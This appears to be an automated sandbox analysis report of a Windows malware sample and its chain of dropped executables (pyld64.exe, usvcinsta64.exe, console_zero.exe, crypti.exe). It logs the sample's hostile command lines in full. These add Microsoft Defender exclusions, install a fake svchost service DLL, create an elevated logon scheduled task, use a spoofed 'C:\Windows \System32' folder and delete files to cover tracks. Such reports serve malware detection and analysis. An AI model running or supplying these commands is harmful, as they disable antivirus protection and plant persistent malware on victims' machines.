Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D35600F884_2_00007FF6D35600F8
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3548FD884_2_00007FF6D3548FD8
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3564E7C84_2_00007FF6D3564E7C
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D355EE4C84_2_00007FF6D355EE4C
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3547EC084_2_00007FF6D3547EC0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D3534DA084_2_00007FF6D3534DA0
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356EDB484_2_00007FF6D356EDB4
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA973C1887_2_00007FF6EA973C18
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA92718087_2_00007FF6EA927180
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96BBF087_2_00007FF6EA96BBF0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA92CBC087_2_00007FF6EA92CBC0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA93ABD087_2_00007FF6EA93ABD0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA952B5887_2_00007FF6EA952B58
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA948B9687_2_00007FF6EA948B96
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA963B7887_2_00007FF6EA963B78
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96AC8487_2_00007FF6EA96AC84
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96CA0087_2_00007FF6EA96CA00
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94898087_2_00007FF6EA948980
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA938AA087_2_00007FF6EA938AA0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA948FD887_2_00007FF6EA948FD8
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA9600F887_2_00007FF6EA9600F8
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA95F05087_2_00007FF6EA95F050
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA934DA087_2_00007FF6EA934DA0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96EDB487_2_00007FF6EA96EDB4
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA947EC087_2_00007FF6EA947EC0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA95EE4C87_2_00007FF6EA95EE4C
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA964E7C87_2_00007FF6EA964E7C
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA93A3E087_2_00007FF6EA93A3E0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA9341E087_2_00007FF6EA9341E0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA9611F887_2_00007FF6EA9611F8
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA92619087_2_00007FF6EA926190
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96B2FC87_2_00007FF6EA96B2FC
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA97030087_2_00007FF6EA970300
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94925887_2_00007FF6EA949258
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA95F25487_2_00007FF6EA95F254
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94825087_2_00007FF6EA948250
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA92C2B087_2_00007FF6EA92C2B0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA92D2B087_2_00007FF6EA92D2B0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96A7EC87_2_00007FF6EA96A7EC
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94A7F087_2_00007FF6EA94A7F0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA92582087_2_00007FF6EA925820
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94879087_2_00007FF6EA948790
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA93A5C087_2_00007FF6EA93A5C0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96D56887_2_00007FF6EA96D568
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA9736C087_2_00007FF6EA9736C0
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA92671087_2_00007FF6EA926710
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96167C87_2_00007FF6EA96167C
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3791AB0 appears 77 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE0FE appears 63 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE278 appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA55830A0 appears 214 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE27E appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE896 appears 148 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA37976EA appears 38 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3368FD0 appears 105 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AEDF0 appears 844 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA5583190 appears 113 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE104 appears 461 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3782D70 appears 260 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3782C50 appears 63 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE1CA appears 1339 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE8A2 appears 128 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE926 appears 36 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3358330 appears 65 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33AE10A appears 59 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA33583C0 appears 71 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFDA3782CD0 appears 48 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA5583190 appears 327 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA55830A0 appears 445 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA55B03F0 appears 47 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA55B98E0 appears 82 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA55A1800 appears 42 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA55A1920 appears 39 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA55832A0 appears 47 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFDA55B9870 appears 35 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF6F8C56FF0 appears 50 times
Source: libiconv-2.dll.40.drStatic PE information: Number of sections : 20 > 10
Source: libintl-9.dll.40.drStatic PE information: Number of sections : 20 > 10
Source: libwinpthread-1.dll.40.drStatic PE information: Number of sections : 12 > 10
Source: Ld0f3NDosJ.exe, 00000003.00000003.2284751779.000001E8C10DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs Ld0f3NDosJ.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
Source: classification engineClassification label: mal100.evad.winEXE@157/53@5/5
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA37959C0 GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy,53_2_00007FFDA37959C0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4892:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3084:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_roxaabse.lav.ps1Jump to behavior
Source: Ld0f3NDosJ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Ld0f3NDosJ.exeReversingLabs: Detection: 52%
Source: Ld0f3NDosJ.exeVirustotal: Detection: 54%
Source: svchost.exeString found in binary or memory: -start
Source: svchost.exeString found in binary or memory: -addr
Source: svchost.exeString found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
Source: unknownProcess created: C:\Users\user\Desktop\Ld0f3NDosJ.exe "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\pyld64.exe "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x543664
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k DcomLaunch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: unknownProcess created: C:\Windows\System32\console_zero.exe C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\console_zero.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"Jump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Users\user\Desktop\pyld64.exe"Jump to behavior
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\pyld64.exe "C:\Users\user\Desktop\pyld64.exe" Jump to behavior
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"Jump to behavior
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld64.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe" Jump to behavior
